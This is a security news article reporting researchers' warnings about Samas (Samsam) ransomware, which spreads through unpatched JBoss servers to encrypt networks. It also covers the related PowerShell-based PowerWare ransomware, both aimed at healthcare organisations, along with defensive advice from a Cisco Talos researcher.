This article is part of our Essential Guide: Essential guide to securing hybrid IT infrastructure

Security researchers warn of server-attacking ransomware

New strain of ransomware said to be distributed by compromising servers and using them to move through networks to encrypt and hold multiple data sets to ransom

As a growing number of US hospitals report ransomware attacks, researchers are warning of a new strain of ransomware targeting the healthcare sector that attacks servers in order to lock up entire networks.

Unlike most other malware that encrypts data and demands ransom for its release, the Samas strain of ransomware does not rely on user-focused attack vectors such as phishing emails.

Instead, Samas – also known as Samsam and MSIL.B/C – is distributed by compromising servers and using them to move laterally through networks to encrypt and hold multiple data sets to ransom.

Samas compromises servers by exploiting known vulnerabilities in unpatched versions of the JBoss application server software identified using the Jexboss open-source network-scanning tool.

Samas then encrypts hundreds of different file types with the Rijndael algorithm and encrypts that key with RSA-2048 bit encryption, according to Nick Biasini, security researcher at Cisco Talos.

“This makes the files unrecoverable unless the author made a mistake in the implementation of the encryption algorithms,” he wrote in a blog post.

Samas is also unusual in that once it is installed, it is self-sufficient and there is no communication with command and control servers, making it harder to detect.

The FBI is asking US businesses and software security experts for emergency help in its investigation of Samas, reports Reuters.

In a confidential advisory obtained by Reuters, the FBI provided a list of technical indicators to help companies determine if they were victims of Samas and to enable network defence activities to reduce the risk of similar attacks in future.

However, like most other forms of ransomware, Samas demands payment in bitcoin and in some cases has offered payment options for multiple files, according to Biasini.

During the Cisco Talos investigation, he said researchers found multiple bitcoin wallets being presented to users containing a total of around 275 bitcoins worth about $115,000.

Read more about ransomware

  • Businesses are still getting caught by ransomware even though there are fairly straightforward methods to avoid it.
  • Criminals use devices compromised for click fraud as the first step in a chain of infections leading to ransomware attacks, warns security firm Damballa.
  • The first half of 2014 saw an increase in online attacks that lock up user data and hold it to ransom.
  • The Cryptolocker ransomware caught many enterprises off guard, but there is a defence strategy that works against it.

Biasini believes ransomware will continue to be a threat to the internet until attackers find a more profitable technique.

“Protection against such threats is best achieved using a multi-tier defence architecture to ensure potential threats are scanned multiple times,” he said. “However, one of the most effective ways to protect yourself is by simply backing up valuable files.”

According to Biasini, targeted organisations often find that when backups are most needed, they are either non-existent or incomplete.

“These lapses provide the revenue stream that is currently fuelling the development of ransomware,” he said.

Ransomware is one of the top international cyber threats, along with distributed denial of service (DDoS) attacks and bullet-proof hosting services, according to the UK National Crime Agency.

Research has shown that relatively low-cost ransomware attacks typically net thousands of pounds a week for attackers.

Warnings about Samas ransomware coincide with similar warnings by Carbon Black about ransomware created using Microsoft’s PowerShell scripting language for system administration.

Dubbed “PowerWare”, the ransomware is also being used to target organisations in the healthcare sector, as well as other enterprises.

By using PowerShell to retrieve and execute the malicious code, the ransomware can avoid writing new files to disk and blend in with legitimate activity, making it much harder to detect.

Read more on Hackers and cybercrime prevention